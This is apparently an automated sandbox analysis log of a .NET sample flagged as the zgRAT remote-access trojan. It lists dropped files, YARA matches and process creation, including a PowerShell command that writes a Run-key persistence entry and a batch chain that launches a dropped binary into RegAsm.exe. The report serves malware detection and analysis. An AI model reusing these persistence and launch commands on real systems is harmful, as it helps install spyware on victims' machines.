Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00441330	13_2_00441330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00442380	13_2_00442380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00401388	13_2_00401388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00406BB0	13_2_00406BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004123B0	13_2_004123B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428C5E	13_2_00428C5E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00412C3C	13_2_00412C3C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00422480	13_2_00422480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0041CC90	13_2_0041CC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040A4A0	13_2_0040A4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00441D50	13_2_00441D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00422D6A	13_2_00422D6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042CD06	13_2_0042CD06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042BD10	13_2_0042BD10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00413D23	13_2_00413D23
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00419D22	13_2_00419D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00443DE0	13_2_00443DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004265A2	13_2_004265A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00423640	13_2_00423640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00427640	13_2_00427640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00428E63	13_2_00428E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00423624	13_2_00423624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0043D630	13_2_0043D630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00404EC0	13_2_00404EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004426B0	13_2_004426B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0042C752	13_2_0042C752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00440750	13_2_00440750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00406F70	13_2_00406F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00426F10	13_2_00426F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040D7D0	13_2_0040D7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040FFDE	13_2_0040FFDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004437E0	13_2_004437E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00440FE0	13_2_00440FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_0040AF80	13_2_0040AF80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00409F80	13_2_00409F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00403790	13_2_00403790

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\57lklPjdPc.exe B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\l6E.exe D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040C590 appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040DF50 appears 178 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 1692

Source: 57lklPjdPc.exe, 00000000.00000002.50529275457.000000000149E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50539479323.00000000043CB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000000.00000002.50539479323.000000000458A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePluginExecuting.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000004.00000002.49603643595.0000000003191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000004.00000002.49603643595.000000000327D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000004.00000002.49604324592.0000000004255000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000004.00000002.49606394796.00000000056F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000004.00000002.49602225936.00000000013BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000005.00000002.49684691564.0000000003569000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe, 00000005.00000002.49685829672.0000000004631000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe	Binary or memory string: OriginalFilenameAlkuhercfw.exe" vs 57lklPjdPc.exe
Source: 57lklPjdPc.exe.0.dr	Binary or memory string: OriginalFilenameAlkuhercfw.exe" vs 57lklPjdPc.exe

Source: 57lklPjdPc.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.57lklPjdPc.exe.458aac8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.57lklPjdPc.exe.444aaa8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.57lklPjdPc.exe.7490000.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.57lklPjdPc.exe.458aac8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.57lklPjdPc.exe.7490000.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.57lklPjdPc.exe.444aaa8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.50550437994.0000000007490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT

Source: 57lklPjdPc.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 57lklPjdPc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: l6E.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 57lklPjdPc.exe, InfoBaseConnector.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 57lklPjdPc.exe, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 57lklPjdPc.exe, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 57lklPjdPc.exe.0.dr, Token.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 57lklPjdPc.exe.0.dr, Token.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/9@2/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00438710 CoCreateInstance,

13_2_00438710

Source: C:\Users\user\Desktop\57lklPjdPc.exe

File created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe

Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Mutant created: \Sessions\1\BaseNamedObjects\fe5d05a685
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7340
Source: C:\Users\user\AppData\Roaming\l6E.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7068:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03

Source: C:\Users\user\Desktop\57lklPjdPc.exe

File created: C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat

Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" "

Source: 57lklPjdPc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 57lklPjdPc.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\57lklPjdPc.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 57lklPjdPc.exe	Virustotal: Detection: 61%
Source: 57lklPjdPc.exe	ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\57lklPjdPc.exe

File read: C:\Users\user\Desktop\57lklPjdPc.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\57lklPjdPc.exe "C:\Users\user\Desktop\57lklPjdPc.exe"
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe "C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe "C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7340 -s 1692
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\F0nw44vZv1g9.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\57lklPjdPc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
